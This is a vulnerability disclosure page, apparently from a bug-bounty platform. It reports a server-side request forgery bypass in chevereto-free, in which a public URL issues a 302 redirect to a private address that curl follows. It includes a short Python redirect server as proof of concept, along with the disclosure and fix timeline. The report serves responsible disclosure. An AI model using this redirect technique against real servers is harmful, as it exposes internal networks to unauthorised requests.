Server-Side Request Forgery (SSRF) in rodber/chevereto-free


Reported on

Dec 30th 2021


There was some hardening done previously against private IP addresses in the SSRF vulnerability I disclosed in the previous report However the checks can be bypassed by URL redirection.

Proof of Concept

If resolves to a Public IP address, it will pass the isValidUrl check, if this same redirects to a private IP address, by serving a 302 Response, when passed to curl_exec, it will cause curl_exec to query the private address instead because in CURLOPT_SETLOCATION is set to 1, which tells curl to follow redirects.

A redirector for testing can be set up like this

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2:
    print("Usage: {} <port_number> <url>".format(sys.argv[0]))

class Redirect(BaseHTTPRequestHandler):
   def do_GET(self):
       self.send_header('Location', sys.argv[2])

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
python [port] [redirect_url]


This vulnerability is capable of SSRF (server makes requests to the internal network)



Redirection should be disabled for file_get_contents too

We are processing your report and will contact the rodber/chevereto-free team within 24 hours. a year ago
haxatron modified the report
a year ago
haxatron submitted a
a year ago
We have contacted a member of the rodber/chevereto-free team and are waiting to hear back a year ago
We have sent a follow up to the rodber/chevereto-free team. We will try again in 7 days. a year ago
Rodolfo Berrios validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Rodolfo Berrios marked this as fixed in 1.6.2 with commit 586031 a year ago
haxatron has been awarded the fix bounty
This vulnerability will not receive a CVE
functions.php#L1651 has been validated
functions.php#L1691L1693 has been validated
to join this conversation